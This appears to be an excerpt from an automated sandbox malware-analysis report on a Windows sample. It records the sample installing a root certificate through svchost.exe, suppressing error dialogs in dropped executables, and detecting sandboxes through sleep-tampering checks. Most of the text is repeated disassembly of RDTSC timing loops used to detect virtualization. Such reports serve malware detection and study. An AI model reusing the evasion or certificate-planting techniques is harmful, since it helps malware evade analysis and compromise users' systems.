Source: C:\Windows\System32\svchost.exe | Code function: 36_2_00000001800B6170 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,36_2_00000001800B6170
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\System32\svchost.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT
Stores large binary data to the registry
Source: C:\Windows\System32\svchost.exe | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
Disables application error messages (SetErrorMode)
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\431846743.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskeng.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WinNetCore\231824723.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe | Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Found evasive API chain (trying to detect sleep duration tampering with parallel thread)
Source: C:\Windows\System32\svchost.exe | Function chain: fileOpened,fileOpened,fileCreated,fileWritten,threadDelayed,fileOpened,fileRead,handleClosed,fileOpened,fileRead,threadCreated,threadDelayed,sectionLoaded,sectionLoaded,threadDelayed,threadDelayed,threadDelayed,threadDelayed,threadDelayed,threadDelayed,threadDelayed,threadDelayed,threadDelayed,threadDelayed,threadDelayed
Tries to detect virtualization through RDTSC time measurements
Source: C:\Windows\System32\svchost.exeRDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59344h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59813h 0x00000033 call 2AA4F9F6h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59690h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exeRDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59244h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA59653h 0x00000031 call 2AA4FB36h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA59490h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exeRDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59344h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59453h 0x00000033 call 2AA4FEF6h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59850h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exeRDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 sub edi, ebx 0x0000000b xor ebp, ebp 0x0000000d xor edx, edx 0x0000000f div edi 0x00000011 inc esp 0x00000012 mov esi, edx 0x00000014 inc esp 0x00000015 add esi, ebx 0x00000017 je 2AA59875h 0x00000019 dec edx 0x0000001a lea edi, dword ptr [esi+esi] 0x0000001d call 2AA4FEF6h 0x00000022 dec eax 0x00000023 sub esp, 28h 0x00000026 call dword ptr [0001BF96h] 0x0000002c jmp 2AA59130h 0x0000002e jmp dword ptr [0007C47Ah] 0x00000034 mov ecx, dword ptr [7FFE0004h] 0x0000003b dec eax 0x0000003c mov eax, dword ptr [7FFE0320h] 0x00000043 dec eax 0x00000044 imul eax, ecx 0x00000047 dec eax 0x00000048 shr eax, 18h 0x0000004b ret 0x0000004c mov ecx, eax 0x0000004e rdtsc
Source: C:\Windows\System32\svchost.exeRDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59124h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA598B3h 0x00000033 call 2AA4FBF6h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59250h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exeRDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 sub edi, ebx 0x0000000b xor ebp, ebp 0x0000000d xor edx, edx 0x0000000f div edi 0x00000011 inc esp 0x00000012 mov esi, edx 0x00000014 inc esp 0x00000015 add esi, ebx 0x00000017 je 2AA59275h 0x00000019 dec edx 0x0000001a lea edi, dword ptr [esi+esi] 0x0000001d call 2AA4FD36h 0x00000022 dec eax 0x00000023 sub esp, 28h 0x00000026 call dword ptr [0001BF96h] 0x0000002c jmp 2AA59350h 0x0000002e jmp dword ptr [0007C47Ah] 0x00000034 mov ecx, dword ptr [7FFE0004h] 0x0000003b dec eax 0x0000003c mov eax, dword ptr [7FFE0320h] 0x00000043 dec eax 0x00000044 imul eax, ecx 0x00000047 dec eax 0x00000048 shr eax, 18h 0x0000004b ret 0x0000004c mov ecx, eax 0x0000004e rdtsc
Source: C:\Windows\System32\svchost.exeRDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59144h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59453h 0x00000033 call 2AA4FD36h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59250h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exeRDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59484h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA598B3h 0x00000031 call 2AA4FEF6h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA59350h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exeRDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA594E4h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA598B3h 0x00000033 call 2AA4FBF6h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59350h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exeRDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59844h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA590F3h 0x00000031 call 2AA4FF96h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA59130h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exeRDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59684h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59813h 0x00000033 call 2AA4FEF6h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59490h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exeRDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59344h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA59113h 0x00000031 call 2AA4FD36h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA59690h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exeRDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59844h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59453h 0x00000033 call 2AA4FD36h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59850h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exeRDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA598E4h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA594B3h 0x00000031 call 2AA4FD36h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA59350h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exeRDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59684h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59813h 0x00000033 call 2AA4FB96h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59490h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exeRDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA598E4h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA59653h 0x00000031 call 2AA4FF96h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA59850h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exeRDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59844h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59813h 0x00000033 call 2AA4FEF6h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59530h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exeRDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 sub edi, ebx 0x0000000b xor ebp, ebp 0x0000000d xor edx, edx 0x0000000f div edi 0x00000011 inc esp 0x00000012 mov esi, edx 0x00000014 inc esp 0x00000015 add esi, ebx 0x00000017 je 2AA594B5h 0x00000019 dec edx 0x0000001a lea edi, dword ptr [esi+esi] 0x0000001d call 2AA4FB36h 0x00000022 dec eax 0x00000023 sub esp, 28h 0x00000026 call dword ptr [0001BF96h] 0x0000002c jmp 2AA591D0h 0x0000002e jmp dword ptr [0007C47Ah] 0x00000034 mov ecx, dword ptr [7FFE0004h] 0x0000003b dec eax 0x0000003c mov eax, dword ptr [7FFE0320h] 0x00000043 dec eax 0x00000044 imul eax, ecx 0x00000047 dec eax 0x00000048 shr eax, 18h 0x0000004b ret 0x0000004c mov ecx, eax 0x0000004e rdtsc
Source: C:\Windows\System32\svchost.exeRDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59484h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59453h 0x00000033 call 2AA4FB36h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59350h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exeRDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 sub edi, ebx 0x0000000b xor ebp, ebp 0x0000000d xor edx, edx 0x0000000f div edi 0x00000011 inc esp 0x00000012 mov esi, edx 0x00000014 inc esp 0x00000015 add esi, ebx 0x00000017 je 2AA59575h 0x00000019 dec edx 0x0000001a lea edi, dword ptr [esi+esi] 0x0000001d call 2AA4F7F6h 0x00000022 dec eax 0x00000023 sub esp, 28h 0x00000026 call dword ptr [0001BF96h] 0x0000002c jmp 2AA59850h 0x0000002e jmp dword ptr [0007C47Ah] 0x00000034 mov ecx, dword ptr [7FFE0004h] 0x0000003b dec eax 0x0000003c mov eax, dword ptr [7FFE0320h] 0x00000043 dec eax 0x00000044 imul eax, ecx 0x00000047 dec eax 0x00000048 shr eax, 18h 0x0000004b ret 0x0000004c mov ecx, eax 0x0000004e rdtsc
Source: C:\Windows\System32\svchost.exeRDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA598E4h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA598B3h 0x00000033 call 2AA4FEF6h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59850h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exeRDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59684h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA59453h 0x00000031 call 2AA4F876h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA59850h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
